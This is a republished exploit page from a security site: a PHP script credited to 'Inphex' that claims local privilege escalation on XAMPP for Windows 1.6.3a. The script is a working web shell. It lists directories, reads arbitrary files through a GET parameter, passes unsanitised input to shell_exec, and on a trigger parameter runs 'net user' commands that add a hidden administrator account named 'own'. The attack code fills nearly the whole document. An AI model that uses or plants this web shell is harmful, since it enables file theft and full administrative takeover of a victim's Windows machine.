|
XAMPP for Windows 1.6.3a Local Privilege Escalation Exploit
|
|
来源:www.vfocus.net 作者:Inphex 发布时间:2007-08-28
|
|
<?php
//Inphex
//htdocs must be accessable and writable,apache must have been ran by root.
//to add a user open like this : script.php?qQx
// Directory of C:\Documents and Settings\Admin
//27.08.2007 16:36 <DIR> .
//27.08.2007 16:36 <DIR> ..
//14.08.2007 14:21 108 .asadminpass
//14.08.2007 14:21 772 .asadmintruststore
//14.08.2007 18:31 <DIR> .exe4j4
//26.08.2007 03:13 427 .glade2
//21.08.2007 16:35 <DIR> .msf3
//10.08.2007 04:41 <DIR> Contacts
//27.08.2007 01:44 129 default.pls
//27.08.2007 17:57 <DIR> Desktop
//23.08.2007 21:12 <DIR>
$qQa = ($_GET['qmB'] == "")?"./":$_GET['qmB'];
$qQd = opendir($qQa);
if (isset($_GET['qrF']))
{
$qrX = fopen($_GET['qrF'],"r");
echo fread($qrX,50000);
exit;
} elseif(isset($_GET['qQx'])) { exec("net user own own /add & net localgroup Administratoren own /add"); echo "User own -> full privileges successfully addet";exit;}
echo "<textarea rows=40 cols=80 style='position:absolute;margin-left:390;'>";
echo htmlspecialchars(shell_exec("cd ".$qQa." & dir"));
echo "</textarea>";
while (false !== ($qQr = readdir($qQd))){
switch(filetype($qQa.$qQr))
{
case "dir":
echo "<a href=?qmB=".urlencode(htmlspecialchars(realpath($qQa.$qQr)))."/>".htmlspecialchars($qQr)."</a><br>";
break;
case "file":
echo "<a href=?qrF=".urlencode(htmlspecialchars(realpath($qQa.$qQr))).">".htmlspecialchars($qQr)."</a><br>";
break;
}
}
?>
|
| |
|
[ 推荐]
[ 评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|
| |
|
|
 |
|
推荐广告 |
|
|
|
|
|
